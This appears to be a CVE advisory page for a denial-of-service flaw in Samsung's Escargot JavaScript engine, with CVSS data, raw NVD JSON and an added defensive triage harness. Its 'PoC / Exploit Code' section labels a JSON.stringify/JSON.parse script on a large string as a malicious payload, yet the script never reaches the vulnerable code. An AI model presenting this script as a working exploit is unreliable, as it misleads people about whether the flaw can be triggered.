Security Vulnerability Report
CVE-2026-25204

Published: 2026-04-13 01:16:35
Last Modified: 2026-04-13 15:01:44

Description

Deserialization of untrusted data vulnerability in the Samsung open source Escargot JavaScript engine allows a denial of service condition via process abort. This issue affects escargot prior to commit hash 97e8115ab1110bc502b4b5e4a0c689a71520d335.

Weaknesses (from the NVD record): CWE-502 (Deserialization of Untrusted Data) and CWE-843 (Access of Resource Using Incompatible Type, "Type Confusion").

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No CPE configuration data is available in the NVD record; the affected range below is taken from the description.

Samsung Escargot < commit 97e8115ab1110bc502b4b5e4a0c689a71520d335

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for CVE-2026-25204
// This script demonstrates a potential trigger for the deserialization vulnerability
// in Samsung Escargot leading to a process abort (DoS).
// Note: JSON.stringify/JSON.parse below stand in for the engine-internal
// deserialization path. The script only exercises the public API, so it has to be
// run under the Escargot shell itself to observe any engine behaviour.

function serializeObject(obj) {
  // Simulating a serialization process
  return JSON.stringify(obj);
}

function deserializeObject(data) {
  // The vulnerable deserialization function in Escargot
  // In a real scenario, this would be the internal engine API
  return JSON.parse(data);
}

function triggerDoS() {
  console.log("[+] Attempting to trigger CVE-2026-25204...");
  // Constructing a malicious payload designed to crash the engine
  // The specific structure depends on the internal implementation details of Escargot
  let maliciousPayload = {
    "exploit": "deserialization_abort",
    "data": "A".repeat(0x100000) // Large input to trigger memory/logic issues
  };
  try {
    let serializedData = serializeObject(maliciousPayload);
    // Passing the malicious data to the vulnerable component
    let result = deserializeObject(serializedData);
    console.log("[-] Exploit failed, process did not abort.");
  } catch (e) {
    console.log("[!] Exception occurred: " + e.message);
  }
}

triggerDoS();
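The script above runs inside an engine and only calls the public JSON API, so on its own it cannot tell you whether a build is affected. Below is an added triage harness, not from the NVD record and not Escargot project code, that does the two checks a practitioner actually wants for this advisory: whether a local escargot checkout already contains the fix commit named in the description (a git ancestry check), and whether the engine binary dies with SIGABRT when fed a candidate input, which is the "process abort" impact the advisory describes and is distinct from a hang or a clean exit. ESCARGOT_BIN, the repository path and the candidate inputs are assumptions; the harness contains no trigger for the bug.

```python
"""Triage harness for a process-abort (DoS) report against a JS engine build.

Added example: not part of the NVD record and not Escargot project code.
It answers the two questions a practitioner has for this advisory:
  1. does a local escargot checkout already contain the fix commit named in
     the description (git ancestry check), and
  2. when the engine binary is fed a candidate input, does the process die
     with SIGABRT, which is the "process abort" impact the advisory describes.
ESCARGOT_BIN, the repository path and the candidate inputs are assumptions;
no trigger for the bug is included here.
"""
import signal
import subprocess
from dataclasses import dataclass
from typing import Dict, List, Optional

FIX_COMMIT = "97e8115ab1110bc502b4b5e4a0c689a71520d335"  # from the advisory text
ESCARGOT_BIN = "./escargot"  # assumption: path to a locally built engine binary


def has_fix_commit(repo_dir: str, sha: str = FIX_COMMIT) -> Optional[bool]:
    """True if HEAD of repo_dir descends from sha, False if it does not, and
    None when sha is unknown to the repo (shallow clone, stale fetch, or the
    wrong repository), so an absent object is never reported as 'fixed'."""
    exists = subprocess.run(
        ["git", "-C", repo_dir, "cat-file", "-e", sha + "^{commit}"],
        capture_output=True)
    if exists.returncode != 0:
        return None
    ancestor = subprocess.run(
        ["git", "-C", repo_dir, "merge-base", "--is-ancestor", sha, "HEAD"],
        capture_output=True)
    return ancestor.returncode == 0


@dataclass
class RunResult:
    exit_code: Optional[int]       # subprocess returncode; None on timeout
    signal_name: Optional[str]     # e.g. "SIGABRT" when killed by a signal
    timed_out: bool = False

    @property
    def aborted(self) -> bool:
        return self.signal_name == "SIGABRT"


def classify_signal(returncode: int) -> Optional[str]:
    """Map a return code to a signal name. subprocess reports death-by-signal
    as a negative code on POSIX; codes above 128 follow the shell's 128+N
    convention, seen when the engine is launched through a wrapper script
    (that second mapping is a heuristic: a program may exit 134 on its own)."""
    if returncode < 0:
        num = -returncode
    elif returncode > 128:
        num = returncode - 128
    else:
        return None
    try:
        return signal.Signals(num).name
    except ValueError:
        return None


def run_case(cmd: List[str], case_path: str, timeout: float = 10.0) -> RunResult:
    """Run cmd + [case_path] and classify how the process ended."""
    try:
        proc = subprocess.run(cmd + [case_path], capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        # A hang is a different availability failure from an abort; report it apart.
        return RunResult(exit_code=None, signal_name=None, timed_out=True)
    except FileNotFoundError:
        raise SystemExit(f"engine binary not found: {cmd[0]}")
    return RunResult(exit_code=proc.returncode,
                     signal_name=classify_signal(proc.returncode))


def triage(cmd: List[str], case_paths: List[str]) -> Dict[str, RunResult]:
    """Run every candidate input and return {path: RunResult}."""
    return {p: run_case(cmd, p) for p in case_paths}


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 3:
        raise SystemExit(f"usage: {sys.argv[0]} <escargot-repo-dir> <case.js>...")
    print("fix commit in HEAD:", has_fix_commit(sys.argv[1]))
    for path, res in triage([ESCARGOT_BIN], sys.argv[2:]).items():
        how = "TIMEOUT" if res.timed_out else (res.signal_name or f"exit {res.exit_code}")
        print(f"{path}: {how}{'  <-- process abort' if res.aborted else ''}")
```

Run it as `python3 triage.py /path/to/escargot case1.js case2.js` with ESCARGOT_BIN pointing at the built shell. A SIGABRT result matches the advisory's impact; a SIGSEGV or a timeout is a different failure and should be triaged separately, and a `None` from has_fix_commit means the checkout cannot see the fix commit at all, which is not the same as being fixed.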

References

https://github.com/Samsung/escargot/pull/1554 (listed in the NVD record)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-25204",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-13T01:16:35.313",
    "lastModified": "2026-04-13T15:01:43.663",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Deserialization of untrusted data vulnerability in Samsung Open Source Escargot Java Script allows denial of service condition via process abort.\n\nThis issue affects escarogt prior to commit hash \n\n97e8115ab1110bc502b4b5e4a0c689a71520d335"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.2,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-502" },
          { "lang": "en", "value": "CWE-843" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Samsung/escargot/pull/1554",
        "source": "[email protected]"
      }
    ]
  }
}